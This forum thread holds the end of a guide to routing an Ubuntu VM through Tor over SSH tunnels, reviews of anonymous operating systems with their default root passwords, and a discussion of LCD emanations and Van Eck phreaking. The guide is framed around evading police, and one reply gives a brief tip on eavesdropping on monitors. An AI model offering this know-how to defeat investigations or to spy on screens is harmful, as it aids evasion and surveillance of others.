To start Torchat, go to "Applications" -> "Internet" -> "Torchat Instant Messenger"


=== 16. Creating TOR-Only Internet Environment ===

Up until now, we have been using our Virtual Machine to access the internet directly. This was necessary so that we could install updates, software, and get a feel for how to use Ubuntu.

Now it is time to force Ubuntu to connect to the internet using TOR Only. At the end of this phase, your Ubuntu virtual machine will be usable as a secure and anonymous TOR based browsing environment. It will be *impossible* for you to access the internet except through TOR, and therefore you can rest assured that anything at all you do online through the Ubuntu virtual machine will be through TOR.

First, we need to shut down any running virtual machines. If "Primary" is running, click the 'X' in the top right to close it. Select "Send shutdown signal" and then select "Shut Down" when prompted. If "Firewall" is running, go ahead and close it in the same way, but choose "Power off".

After a minute or so, you should be back to your VirtualBox Manager, with neither virtual machine running.

1. Right click on "Primary, Powered Off" and go to "Settings"

2. Select "Network" from the menu on the left.

3. Next to "Attached to" is a pull down menu. Right now it is set to "NAT". Choose "Internal Network" and click "Ok"

4. Click "Firewall" to highlight it, and then click on "Snapshots (1)" in the top right.

5. Right click on "Snapshot 1" and then select "Restore Snapshot". Select "Restore" if prompted.

6. Right click "Firewall" and click "Start"

Now your Firewall will be resumed exactly where it had been previously set up. The last command entered should still be visible.

Before you proceed, make sure that TOR is running on your main Windows computer. If it is, you will see an "Onion" icon visible in your task bar. Click on that icon and you should see the "Vidalia Control Panel". Make sure that it says "Connected to the TOR Network". If so, you are ready to proceed. If not then please see section 2 : "Using and Testing Tor Browser for the first time" to re-start TOR. Once TOR is running, proceed.

Let's restart Ubuntu:

7. Right click "Primary" and click Start. Log in as normal.

8. After fully logged in, open "Firefox" by clicking the orange "Firefox" logo at the top, next to "System".

9. Try to go to any website, such as http://www.google.com. Try at least 3-5 different websites. You should not be able to connect to any of them.

Note: If you attempt to go to websites you have already been to using Ubuntu, they may appear to load because they are cached.

10. In Firefox on Ubuntu, go to "Edit" and "Preferences"

11. Click on the "Advanced" icon

12. Click on the "Network" tab

13. Under "Connection" it says "Configure how Firefox connects to the internet". To the right of that is a "Settings" button. Click that button.

14. Select "Manual proxy configuration"

15. Next to both "HTTP Proxy" and "SSL Proxy" type in: 127.0.0.1

16. Set the port to 8118 for both "HTTP Proxy" and "SSL Proxy"

17. Next to "SOCKS Host" type: 127.0.0.1

18. Set the port for "SOCKS Host" to 9050

19. Make sure that "SOCKS v5" is selected at the bottom.

20. Click "Ok" and then "Close"

Now we have instructed Firefox to use TOR. However, Firefox cannot use TOR yet. Right now, Ubuntu is completely unable to connect to the Internet. We are going to change that.

21. Go to "Applications" -> "Accessories" -> "Terminal"

22. Type in: sudo bash (and hit enter)

23. Type in your password if prompted.

24. Type in the following commands exactly as shown below (or copy paste them):

ifconfig eth0 10.0.3.2
/etc/init.d/polipo stop
/etc/init.d/tor stop
/etc/init.d/privoxy stop

(Note: the last three commands, those beginning with /etc/ are only necessary if you installed Torchat)

Now you have told your Ubuntu machine to join the same network that your Firewall is on. Now we can establish a tunnel for TOR data to flow from our Ubuntu machine, through the Firewall, into your Windows guest machine. We need to establish two such tunnels.

The first tunnel for port 9050 data, and the second tunnel for port 8118 data. When these two tunnels are set up, it will be possible for you to use your Ubuntu machine to access any website using TOR. Further, it is still completely impossible for your Ubuntu machine to access the Internet in any other way.

25. Your terminal window should still be open. Type in the following command exactly as shown (or copy paste it):

ssh -N -L 9050:10.0.2.2:9050 root@10.0.3.1

26. Type "yes" if prompted. When prompted for the password, give your Firewall password. Not your Ubuntu password.

After you hit enter, you will see the cursor go to a blank line and nothing else happens. This simply means the connection you requested is active. If the connection were to stop for any reason, you would return to a command prompt. If you want to terminate the connection yourself, simply hit CTRL+C. You can type in the same ssh command again if you need to re-open the tunnel.

27. Now we are going to open the second tunnel. In your terminal window, go to "File" and "Open Tab". This will open up a tab for a second terminal without affecting the first.

28. Now, type exactly as shown below to open the second tunnel:

ssh -N -L 8118:10.0.2.2:8118 root@10.0.3.1

29. Return to Firefox. Go to the "File" menu and uncheck "Work Offline" if it is checked.

30. Go to the URL: http://check.torproject.org

If you see the text: "Congratulations. Your browser is configured to use Tor" then you are all set! Your Ubuntu virtual machine is now NOT connected to the internet in any way. However, you can browse any website using TOR, even Youtube. You do not have to be afraid of javascript or Flash. Any files you save onto your virtual machine will automatically be saved in the encrypted truecrypt volume you set up earlier. In fact, everything the virtual machine does will be contained within that truecrypt volume.

Further, even if someone somehow managed to remotely gain full root access to your Ubuntu machine (absurdly unlikely to happen), they would still not be able to see *anything* about who you are, or what your real IP address is, or even that you are using a Virtual Machine. To them, it would appear that the Ubuntu machine is your main computer. They would be totally unable to compromise your identity based on this alone.

However, keep the following in mind. If someone were to gain access to your Ubuntu machine, they WOULD be able to see anything you have used it for or any files you have saved. Therefore, I recommend for the sake of absolute security, do not store anything on your Ubuntu virtual machine that identifies you. This is just a precaution. It is virtually impossible that someone would manage to remotely gain access to your Ubuntu machine.

=== 17. General Daily Usage ===

Much of this guide has involved detailed one-time setup processes. From now on, all you have to do when you want to use TOR from your Ubuntu virtual machine is to follow these steps. Every step listed is a step you have already done, so feel free to re-visit earlier sections if you need help.

1. Start TrueCrypt, and mount your hidden volume which contains your virtual machine.

2. Start VirtualBox

3. Start TorBrowser Bundle.

4. Click "Firewall" to highlight it, and then click on "Snapshots (1)" in the top right.

5. Right click on "Snapshot 1" and then select "Restore Snapshot". Select "Restore" if prompted.

6. Right click "Firewall" and click "Start"

7. Right click "Primary" and click Start. Log in as normal.

8. Go to "Applications" -> "Accessories" -> "Terminal"

9. Type in: sudo bash (and hit enter)

10. Type in your password if prompted.

11. Type in the following commands exactly as shown below (or copy paste them):

ifconfig eth0 10.0.3.2
/etc/init.d/polipo stop
/etc/init.d/tor stop
/etc/init.d/privoxy stop

(Note: the last three commands, those beginning with /etc/ are only necessary if you installed Torchat)

12. Your terminal window should still be open. Type in the following command exactly as shown (or copy paste it):

ssh -N -L 9050:10.0.2.2:9050 root@10.0.3.1

13. Type "yes" if prompted. When prompted for the password, give your Firewall password. Not your Ubuntu password.

14. In your terminal window, go to "File" and "Open Tab".

15. Now, type exactly as shown below to open the second tunnel:

ssh -N -L 8118:10.0.2.2:8118 root@10.0.3.1

16. Return to Firefox. Go to the "File" menu and uncheck "Work Offline" if it is checked.

17. Go to the URL: http://check.torproject.org

If you see the text: "Congratulations. Your browser is configured to use Tor" then you are all set!

Enjoy!

Phew, now I have it complete! I admit it's quite extensive, not to say enormous, but it's the best how-to on anonymity and other safety procedures I have found so far. It secures your sys black-hat style^^ :

http://en.wikipedia.org/wiki/Black_Hat_Briefings (for those of you who don't know black hat ^^)

You don't have to do all steps at once. You can do a little of it every time you have an hour or two to spare. I think for the whole procedure you will need roughly 8-12 hours. I think it's written in a way everybody should be able to follow. If there are still steps unclear just ask, I will see if I can help you. btw this is written for noobs, but the tips here are interesting for almost everybody.

P.S.: Once you have installed TOR you can get access to TOR hidden services and other interesting deep-web pages. If you want some links for your first steps into this hidden part of the internet just ask me. If there are a lot of requests I will write an extra thread with the most important websites in the deepweb. One thing before you get started: most deepweb pages aren't online 24/7. So if you can't reach a certain website be patient and try again and again till you get access. Another thing: you will find websites that are pretty shocking and disturbing. In 99.5% you will see beforehand what you find on those sites, so if you don't want to see certain things don't click on the links.

Now that you have a really secure system, you should know what to do when the shit hits the fan and you are arrested or your home gets searched. Your system is secured in a way they can't break, so the only thing that can incriminate you now is your testimony.
These 2 youtube videos are 2 lectures on behaviour towards the police in such situations. Part one is done by a criminal defense attorney, part 2 by a very experienced police officer. They both tell you about the tricks the police use and how you should react :





tl;dw: say nothing and ask for a lawyer, ALWAYS! You cannot improve your situation with anything you say (this is counterintuitive, but the attorney here has in his whole career NEVER heard of a single case where a suspect could help his case by talking to the police, but he could name many cases where they made matters way worse) but you can make it a lot worse, so shut the hell up and wait for your lawyer.

Even he, being a defense lawyer, wouldn't talk to the police under any circumstances. You can tell your story before court AND NEVER, UNDER NO CIRCUMSTANCES, BEFORE THAT! Even the cop in lecture 2 says NEVER TALK TO THE POLICE !!!!!

#OpShitSorm

NO©
☢☠☢

Share by MasterPirate™ ✔

__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
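
An added example, not part of the post above or of the guide it quotes: a Python check for the two tunnels opened in steps 12 and 15. It confirms that the forwarded ports 9050 and 8118 listen on loopback only and that 9050 answers a SOCKS5 greeting. The `ss -ltn` listing is a constructed sample, and the function names are assumptions of this example.

```python
"""Check the local ends of the two SSH forwards from steps 12 and 15.

Added illustration; function names and the sample listing are assumptions.
"""
import socket
import subprocess

# Local ports opened by "ssh -N -L 9050:..." and "ssh -N -L 8118:..." above.
TUNNEL_PORTS = (9050, 8118)

# Constructed sample of `ss -ltn` output. Here 8118 is bound to every
# interface, which happens when ssh runs with -g or GatewayPorts is enabled.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    127.0.0.1:9050      0.0.0.0:*
LISTEN 0      128    [::1]:9050          [::]:*
LISTEN 0      128    0.0.0.0:8118        0.0.0.0:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
"""


def _is_loopback(addr):
    addr = addr.split("%", 1)[0].strip("[]")  # drop "%lo" scope and brackets
    return addr.startswith("127.") or addr == "::1"


def audit_listeners(ss_output, ports=TUNNEL_PORTS):
    """Map each tunnel port to 'loopback', 'exposed' or 'missing'."""
    seen = {p: [] for p in ports}
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue  # header line or a socket that is not listening
        addr, _, port = fields[3].rpartition(":")
        if port.isdigit() and int(port) in seen:
            seen[int(port)].append(addr)
    result = {}
    for port, addrs in seen.items():
        if not addrs:
            result[port] = "missing"    # the tunnel is not up
        elif all(_is_loopback(a) for a in addrs):
            result[port] = "loopback"   # reachable from this machine only
        else:
            result[port] = "exposed"    # other hosts on the network can use it
    return result


def probe_socks5(host="127.0.0.1", port=9050, timeout=3.0):
    """True if the port answers a SOCKS5 greeting with 'no authentication'.

    ssh accepts the local connection even when nothing listens on the far
    side and then closes it, so an open port alone does not prove the proxy
    is there. Reading the two-byte reply does.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"\x05\x01\x00")  # version 5, one method offered: no-auth
            reply = b""
            while len(reply) < 2:
                chunk = s.recv(2 - len(reply))
                if not chunk:
                    break               # closed before a full reply arrived
                reply += chunk
    except OSError:
        return False                    # refused, timed out or reset
    return reply == b"\x05\x00"


if __name__ == "__main__":
    listing = subprocess.run(["ss", "-ltn"], capture_output=True,
                             text=True, check=False).stdout
    for port, state in audit_listeners(listing).items():
        print(port, state)
    print("9050 speaks SOCKS5:", probe_socks5())
```

A result of "exposed" means the forward should be restarted bound to 127.0.0.1; "missing" means the corresponding ssh command is not running.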
hannah

Registered:
Posts: 797
Reply with quote  #7 
You can also use TORBOX AKA WHONIX- a full operating system (OS)--two virtual machines masking your identity.
This is not just a program for privacy--it is a complete operating system...




http://www.hacker10.com/internet-anonymity/anonymous-operating-system-whonix/

Anonymous operating system Whonix
Posted on 26 September, 2012 by Hacker10

Whonix is an anonymous operating system based on VirtualBox, Debian Linux and the Tor proxy. Whonix consists of two virtual machines: one dedicated to running a Tor proxy acting as a gateway, and a second one, called Whonix-Workstation, located in a completely isolated network. The system has been designed to make IP and DNS leaks impossible; not even malware with root access will be able to find out your computer's IP. All Internet connections are forced through Tor, including applications that do not support proxy settings; this is done using the firewall settings. It is possible to use Whonix with a VPN or SSH tunnel if needed, and hardware serial numbers are also hidden. Any operating system able to run VirtualBox can run Whonix; this includes Windows, Mac, Linux, BSD and Solaris.

Disadvantages of running Whonix are that it will be very slow to update your operating system through Tor, it is more difficult to set up than the Tor browser bundle, and your computer should have a good amount of RAM and a modern CPU to run VirtualBox. Whonix's advantages are that, unlike an anonymous live CD like Tails or Liberté Linux, data will be available after reboot due to persistent storage; you can install your favourite software packages using Debian’s packaging tool apt-get, and the applications will be torified straight away; you can also save virtual machine snapshots, saving a clean one for data recovery if needed.

VirtualBox setting up Whonix operating system

Many Whonix default applications come configured to avoid fingerprinting; GPG software, for example, will not reveal your operating system version, and XChat comes with the default torified setup as described in the Tor Project wiki.

In countries where you can be forced to disclose your full encryption password, Whonix can help with plausible deniability if you hide the .ova virtual machine file inside a hidden encrypted container with Truecrypt or store the virtual machine inside a fully encrypted USB thumbdrive that will look like random data to forensics software.

Note: Development is ongoing, this is an Alpha release.

Visit Whonix homepage

https://github.com/adrelanos/Whonix
0
hannah

Registered:
Posts: 797
Reply with quote  #8 
More anon operating systems reviewed by my sIStErs iN rEvOlUtiON at hacker10.com

http://www.hacker10.com/tag/anonymous-operating-system/

Anonymous Internet surfing with Liberté Linux
Posted on 16 May, 2012 by Hacker10

Liberté Linux review

Liberté Linux is a small (220MB) Gentoo-based, security-oriented distribution available as a live CD, live USB thumbdrive, installable or Open Virtualization Bundle (.ova) compatible with VirtualBox and VMware. This operating system enables people to anonymously communicate with others via chat (Pidgin+OTR, XChat) or email and browse the Internet using Tor. It supports new and old hardware, including 3G modems, Bluetooth and experimental UEFI booting.

Openbox is the default window manager; from there you can configure your mouse, keybindings, timezone, etc. You will find security software like the open source Figaro password manager and GNU Privacy Assistant (GPA) to manage encryption keys, together with tools to read text (ePDFViewer, FBReader), listen to audio (Audacious), watch videos (Movie Player), edit images (Geeqie) and a task manager displaying CPU and RAM. Liberté Linux keeps its size small by replacing bloated software with lightweight tools that do not carry unnecessary features; for example, instead of using LibreOffice to edit text it comes with Abiword.

Liberté Linux Anonymous operating system

The wireless network card MAC address is randomly changed at boot time. The only thing Liberté Linux asks the user to enter is a passphrase during installation, in order to create a LUKS-compatible encrypted storage space using otfe (on-the-fly encryption), where persistent user data will be stored in /mnt/boot/otfe/liberte.vol using a paranoid 8192 RSA key that will take a couple of minutes to generate. The user is automatically logged in as “anon”. If you need to be root (and it is never a good idea to browse the Internet as root), the root password is “liberte”; entering “gentoo=root” during boot will also unlock it.

Epiphany is the default browser; leaner than Firefox, it comes with HTML5 support, and you shouldn’t need Flash to view online videos on YouTube. The browser has been configured to surf the Internet through Tor, including links to The Hidden Wiki, Wikileaks and Torcheck on the main page to get you started. The Florence virtual keyboard allows the user to enter text using the mouse, a good way to bypass hardware keyloggers on public computers. RAM memory is wiped when you power off the system to stop cold boot attacks.

Liberté Linux is pioneering the use of Cable Communications for anonymous email exchange, achieved by giving the user a cryptic .onion and .i2p address that functions as a personal email address; it requires some configuration in Claws email to use it. Message delivery can take hours or days, and you will get a delivery receipt once the message reaches the recipient.

Liberté Linux Florence virtual keyboard

It is possible to run a stand-alone VPN or PPTP using the network manager and tor-resolve in console mode. You can run Liberté Linux inside Windows too, but I would not advise it as IMHO it weakens your privacy. I have used other Linux distributions for anonymous Internet surfing, like Tails and OccupyOS, and I have decided to adopt Liberté Linux as my default distro for secure communications. I find it more suitable for me because it is more lightweight, it comes with detailed documentation, it creates an encrypted storage space for user data, and there is the option to disable Tor in case I need to log in to Paypal or any similar site blocking proxies.

I don’t think you will be disappointed with this operating system. If you are wondering why it does not include Truecrypt I suspect that it might have to do with the fact that Truecrypt is not released under the standard Linux GPL license and this can be a problem. However, you can create your own encrypted containers from command line with otfe.

Visit Liberté Linux homepage

OccupyOS anonymous operating system for activists
Posted on 5 December, 2011 by Hacker10

OccupyOS review

OccupyOS is a live CD distribution based on Gentoo Linux and inspired by the Occupy Wall Street movement. It has been designed to allow activists from all over the world to anonymously edit and publish documents on the web, as well as manage Twitter and Facebook accounts, securely communicating with other activists while bypassing any ISP Internet filter. This is accomplished using Tor or a VPN for web browsing and general Internet access, encrypted voice chat using Mumble, encrypted instant messaging with Pidgin-OTR (Off The Record plugin) and XChat with OTR for anonymous IRC chat, a MAC address changer to stop others from linking your computer's network card with ISP logs, VNC to remotely connect to other computers, OpenSSH, OpenSSL, sfdisk to manage disk partitions and The Gimp to edit images.

You can also use this Linux distribution to directly trash your hard disk beyond recovery using DBAN. Instead of having a pile of CDs, OccupyOS comes with additional tools that can be selected at boot time, like DBAN, a Windows NT password and registry editor, and FreeDOS, an open source DOS-compatible operating system for IBM-PC systems that should work with old hardware.

OccupyOS anonymous Linux distro

It doesn’t look as if OccupyOS has reinvented the wheel; it pretty much overlaps Tails, a better established live CD for anonymous Internet browsing, but it might have a couple of utilities that Tails doesn’t have, and it could come in handy if for some reason Tails does not work on your computer. The OccupyOS roadmap includes adding a reactive firewall (a reactive firewall has the ability to react to malicious hacking attempts, whereas passive firewalls only alert the user and log the attempt), using Samhain, a file integrity utility to check system changes, implementing a low power boot-up mode, finding an email client supporting GnuPG encryption, and others.

Note: This distribution is still in development, you can only download a beta version for testing.

Visit OccupyOS homepage

Anonymous web surfing with The Amnesic Incognito Live System
Posted on 18 April, 2011 by Hacker10

Surf the Internet anonymously

Tails, short for The Amnesic Incognito Live System, has Ad-block preinstalled on its Iceweasel (Firefox-based) browser. It comes with many other privacy-enhancing tools to stop companies and repressive governments tracking down Internet users.

This Debian-based Linux live CD enables you to hide your IP address while surfing the Internet. It comes preconfigured to use the anonymous Tor network for all outgoing connections, which will hide your IP at all times. You do not need to know anything about Linux to use it: just download the ISO file, burn it to a CD, reboot your computer, Mac or PC, and it will work straight out of the box.

Anonymous live CD features

Supports mobile broadband devices like 3G USB dongles
Can be booted up from a USB thumbdrive instead of a live CD
Multilingual support including Arabic, Chinese and Spanish among other languages
Firewall drops incoming packets by default
Instant Messenger Pidgin comes with the OTF messaging plugin to proxy communications through tor
Internet browser comes with the HTTPS Everywhere, FireGPG and Ad-block extensions
Stops cold boot attacks by wiping RAM memory on shutdown
Virtual keyboard available to stop keyloggers
Support for i2p eepsites, hidden websites hosted anonymously
Email client ClawsMail comes with GnuPG support to encrypt email messages


The Amnesic Incognito Live System

Live CD with encryption & file deletion

The Amnesic Incognito Live System includes secure-delete integrated in its file manager, a program to wipe free disk space and sensitive files; a front-end encryption key manager called SeaHorse will take care of digital signatures and GPG encryption keys.

If you are comfortable with the Linux command line you can take advantage of cryptsetup to encrypt files and macchanger to change your computer's MAC address. Those are only the security features; open source everyday software for production purposes includes OpenOffice.org to edit documents, The Gimp to edit photos, Audacity to edit sound files and many others.

This operating system to hide your IP address has two preconfigured users, amnesia and root; the password is the same for both of them: amnesia.

Visit The Amnesic Incognito Live System homepage

0
hannah

Registered:
Posts: 797
Reply with quote  #9 
You know you have problems when you are breaking out the tin foil


http://www.schneier.com/blog/archives/2012/12/friday_squid_bl_357.html#c1052218

Sruce Bchneier • December 22, 2012 1:06 AM

TEMPEST Attacks! LCD Monitor leaks system noise to FRS
=
I don't operate any wireless equipment at my living location. This includes computers, computer equipment, routers, non-computer equipment, etc.

I'm having a problem with one of my LCD monitors.

It works without problems. That was until I picked up some heavy static noises from a hand held radio. I eliminated all sources of generating this type of noise until I came towards an LCD monitor. When the monitor is on and there is content on the screen the radio makes several types of garbage(static) sounds. As I manipulate contents on the screen, maximize and minimize windows, open different applications, the radio responds with scratchy(static) noises to match the activity on the screen. This includes typing and mouse movement.

When I switched the desktop background to a solid black color without wallpaper, the radio noise went down to almost nothing. But when I loaded any program with a white background, the noise from the radio exploded in volume.

When I passed the radio across different computer and non-computer electronic devices other than the LCD monitor, the wired mouse made a high pitched squeal sound within the static. None of the other computing devices such as the tower generated any noise.

I tried CRT monitors and separate computers attached to the CRT monitors but they did not generate any noise in the radio. On the computer connected to the net, I unplugged the cable leading to the router to rule this out but it made no difference, the LCD monitor is at fault.

While monitoring the radio noise, there were several instances where the noise on the channel being monitored stopped, and I switched to another channel and the same noise appeared. Why would the noise from the LCD switch channels during normal use of the LCD? Back and forth throughout the day the noise generated by the LCD would switch from one channel to the next and back to the first channel again.

The noise extends several steps within my living location. I'll test this another day to determine if it extends outside my living location and if so by how many feet.

The computer/monitor are grounded and attached to a surge protector. I'm not sure what I need to do to stop this, or if I should ignore it.

I assumed LCDs would be quieter than CRTs when it came to noise.

Unless I have a radio tuned to a specific channel, the LCD does not generate any noise which I can detect, unless it's above my hearing capacity.

The LCD monitor also functions as speakers, and while the sound cable is connected to the tower, I have disabled the onboard sound in my BIOS. The only other connection is the DVI cable to the tower.

How may I decrease this noise or eliminate it? It seems like the LCD is a mini radio station. When I turn it off the noise in the radio stops, if I blacken the screen the noise lessens. When I switch to a colorful background or load white screened applications like a web browser the noise jumps up loudly. I've tried grabbing and moving a browser window around the screen and the movement matches the noises in the radio.

Would any of this be considered normal?
==-
This certainly isn't unheard of; it's because some part of the monitor is unshielded. The more fix-it stuff is at the top of the following, with the technical backdrop that just might be good to know at the bottom.

Unfortunately, the issue is most likely the panel charging the LCs. The only thing you can do is see if the manufacturer will replace it or upgrade you. Complain to the manufacturer, be sure to come up with some important thing it's interfering with(if I recall some medical devices use some sort of radio).

If the issue is actually internal wiring which is highly unlikely as detailed below, and it isn't in warranty, attempt to shield it yourself. To shield it yourself, you'll need thin foil(not kitchen foil) and electrical tape.

So, in any given monitor, there's 3 main parts. Input, logic, and output. Output, as previously mentioned, can't really be shielded. To shield both of the other sections, all you really need to do is manipulate the wiring to reduce the number of holes in the foil wrap needed to put it all back together. Obviously this will take some trial and error, and time.


USEFUL INFO THAT ISN'T REQUIRED:

Shielding wires can best be thought of as encasing a wire in a Faraday cage, made of foil. If you want to see an example, Apple's iPod charging cords are all shielded; strip the insulation and see for yourself. This shielding acts doubly, keeping EM noise from messing with the signal, and keeping the signal's own noise from leaving.

WHY IT IS THE CHARGING PANEL AND NOT WIRING:
Because of the specific details you provided( bravo to you, the amount of data provided helped ), I can conclude that the charging panel(the array of electrodes responsible for producing the image) is putting out the interference. Three of your observations prove this.

First, you state the noise ceases completely when the monitor is turned off, which is consistent with it being EM noise.
Second, the noise's perceived pitch changes when the display is manipulated, which is to be expected, as the electrode charges would change as the display changes.
Third, a black screen is "quieter" than a white screen. Black is the lowest charge state, with the only power in use going to the backlight.

As for your questions:
Noise hopping channels isn't unheard of, though I don't know the science behind it. My best guess is that because the noise isn't an intended result of the electricity, small changes in voltage/amperage result in those hops.
(indirect question-ish) The mouse was likely the only other emitter because it has a fairly high density of wires + it emits light.
===-
@W00t:

What 1s the d1fference between - and where may 1 obta1n the non-k1tchen "foil" you ment1oned?

The d1sturbances sound l1ke a bugged env1ronment. The squeal com1ng from one area and/or dev1ce could mean the locat1on of the bug has been found - and 1 know adding a small dev1ce and/or mod1f1cation to a keyboard and/or mouse 1s s1mple enough - espec1ally for a quick 1n and out the door type bugging.

1s there an affordable method of sh1elding the equ1pment while not violating FCC/TEMPEST laws? Would a simple screen d1mmer attached to the monitor bring the no1se down? Or would 1t be best to put out the extra money requ1red by purchas1ng spec1al paint or wallpaper wh1ch blocks RF signals?

Whether or not 1t's a bug, at this point you are broadcast1ng your computer mon1tor and 1ts activ1t1es, down to the keyboard and mouse movements. What 1s the use of using Tor or any other l1ke serv1ce 1f you are pwned over the a1r waves?
====-
You could use kitchen foil, it's just more unwieldy to work with.

Yes, it could be a bug, I was running under the assumption you had no reason to believe you were bugged, and if you did you ran bug sweeps. If you believe you are bugged, you should definitely dismantle things to make sure a bug isn't simply piggybacking on the same power source.

Dimming the screen would reduce noise, but not completely eliminate it.
=====-
Thanks, W00t.

"Dimming the screen would reduce noise, but not completely eliminate it."

I have modified my browser to function with a black background and my choice of text colors and unchecked the option for all pages to use their own colors, so every page I visit is black with my choice of font/links colors. I'll rescan to determine if this lessens the noise. It's ugly, but tolerable. Coupled with a black theme for the desktop, including the background and system wide applications should also help - including disabling images in the browser.

You mentioned foil. I'm not an electrician, but wouldn't wrapping cords with foil and finishing the job off with a layer of strong black tape possibly conduct electricity? Are you suggesting I cover all wires leading to the computer(s) using this method? Wouldn't they each require special grounding? How many repeating layers of this and/or other material is needed? Have you tried "conductive tubing?"

While I want to shield enough to block noisy RF, I don't want to create a microwave type scenario where RF is contained but it still remains and is possibly amplified so as to add to the degeneration of my health, if that's possible.

1. Ferrite beads
2. Split beads
3. Toroids

CONDUCTIVE TUBING & FERRITE SNAP BEAD
http://www.lessemf.com/wiring.html

https://en.wikipedia.org/wiki/Electromagnetic_interference
https://en.wikipedia.org/wiki/Electromagnetic_radiation_and_health
https://en.wikipedia.org/wiki/Electromagnetic_shielding
https://en.wikipedia.org/wiki/EMF_measurement

I could try some or all of the three options above in addition to your advice? TY
===-
Anyway, this is reminding me of Van Eck phreaking. Look it up, some pretty interesting stuff.

Yep, had the same thought.

Countermeasures are detailed in the article on TEMPEST, the NSA's standard on spy-proofing digital equipment. One countermeasure involves shielding the equipment to minimize electromagnetic emissions. Another method, specifically for video information, scrambles the signals such that the image is perceptually undisturbed, but the emissions are harder to reverse engineer into images. Examples of this include low pass filtering fonts and randomizing the least significant bit of the video data information.
====-
can someone please point me to techie LCD monitor internal guides? If I'm going to take it apart I'd like to know what to expect. I've read more about Van Eck and Tempest than anyone can teach me here. Now I'm looking for LCD guides of what's inside.
===-
To be honest, it's not what's inside the LCD monitor you should be worrying about if you want to phreak LCDs. You should worry more about the RF side of things, and figuring out the spread spectrum clock signal so you can pick up the signal. To top it off, background noise is going to be a bitch when it comes to LCDs. Old CRT monitors are way easier to phreak; those things throw off EM radiation like nobody's business.
===-
The noise coming from the LCD monitor is appearing on FRS channels:

- https://en.wikipedia.org/wiki/Family_Radio_Service

It continues for several minutes before it jumps to another channel then after a few minutes jumps back to the original channel. One of my concerns is the ability for others to pluck this noise from the air (Van Eck/TEMPEST) and monitor my activity, or possibly use an attack against the computer somehow. A recent UN report mentioned a high tech method(s):

* U.N. report reveals secret law enforcement techniques

"Point 201: Mentions a new covert communications technique using software defined high frequency radio receivers routed through the computer creating no logs, using no central server and extremely difficult for law enforcement to intercept."

- http://www.unodc.org/documents/frontpage/...
- http://www.hacker10.com/other-computing/...

In addition, I don't want my LCD monitor constantly sending monitor and/or system activity to a FRS channel(s) for others to hear. I choose wired over wireless for a reason, and there shouldn't be any noise coming from my LCD monitor and appearing over FRS, unless there is a bug or problem with the monitor. All of my CRT systems are silent on FRS.

When I position the radio near different components, the power supply doesn't emit any noise on FRS, but it could be a problem, I don't know, I'll move to that once I resolve the LCD monitor problem, unless the PSU is the problem and not the monitor.

I may take apart the LCD monitor, I'm looking for a good list of what I'll find if I do.

I peered inside the vents on the top/back left hand side with a strong flashlight and came across a strange piece of silver tape inside, here's how I describe it:

OOGGGGGGGGGGGGGGG__

OO = a small thin black material coming out from underneath the silver piece of tape
GG = the strip of silver tape
__ = the bottom right hand portion of the silver tape is raised enough to allow a pinky finger entry

The silver tape/material/opening under tape is on the top left corner inside the monitor. The rest of the length and area inside that I can see contain no tape or black material. I've seen photos of planted bugs in people's living spaces and most if not all of the invasive ones are wrapped/covered in silver foil. I've found no other reason for that strip and material to be there, but what do I know.
=====
In addition, my CDROM drive light blinks once every second, sometimes with a second or 1/2 second in between, and I found this:

http://catless.ncl.ac.uk/Risks/19.60.html#subj9

"I'd worry about a Tempest virus that polled a personal computer's
CD-ROM drive to pulse the motor as a signalling method:

* Modern high-speed CD-ROM drive motors are both acoustically and
electrically noisy, giving you two attack methods for the price of one;

* Laptop computer users without CRTs, and the PC users that can afford
large LCD screens instead of CRTs, often have CD-ROM drives;

* Users are getting quite used to sitting patiently while their
CD-ROM drives grind away for no visibly obvious reason (but
that's quite enough about the widespread installs of software from
Microsoft CD-ROMs that prompted Kuhn's investigation in the first place.)"
===-
I don't think there should be anymore blinking if you remove the CD/DVD inside.
If it keeps blinking, find out which process uses it.
Anyway, you can disable it when you're not using it, if it's bothering you.

And shield your monitor.
http://en.wikipedia.org/wiki/...
====-
"I don't think there should be anymore blinking if you remove the CD/DVD inside."

Does Tails support this at boot?

If not, is there a Linux LiveCD which allows this and does not give you root access at boot?

I've looked at several different distributions which allow you to boot into RAM and remove the CD, but they all give you root and that's a very insecure environment to run TBB in!

"If it keeps blinking, find out which process uses it."

It doesn't blink on the several distros which boot into RAM, but I don't want to run Tor as root or reconfigure the permissions/PAM/etc. just to use TBB. As above, with Tails and many LiveCDs which don't boot into RAM, 99% of them have this blinking light issue. The actual INSTALLS I've done to HDD experience constant light activity too, even more so, without anything to explain them.

For Linux, I've run rkhunter, chkrootkit, tiger, and other tools and nothing malicious is found. Without a deep binary analysis I don't know what else I could do.

For Windows, I use a few programs in the SysInternals Suite and they display strange usage on the system and reference programs which cannot be found with a search on the system, references to impersonation, spoofing, and more. I've run almost every N.American scanner on the Windows systems, including command line only rootkit detectors and I've seen some strange 'strings' of binaries mentioned, but have no idea on how to clean the system.

I prefer to run LiveCDs because all installations, Windows and Linux, contain unexplainable frenzies of blinking lights, far worse than the blink every second on most LiveCDs. I'm wondering if this is firmware malware on my NIC or the CDROM itself. This has existed for years and never goes away, no matter what system I use, this strange baggage seems to re-infect everything.

"Anyway, you can disable it when you're not using it, if it's bothering you."

Disable what?

"And shield your monitor."

Thanks. I'm investigating and most of the guides require specific addons to the computer's cabling system. Most of the guides appear incomplete, or are in a language other than English.

Any comments on the Tempest/blinking light possibility?

Any comments on why it's spewing out noise to FRS stations and freq hopping?
===-
More comments from elsewhere:

@kb2vxa:

"You're making a mountain out of a mole hill."

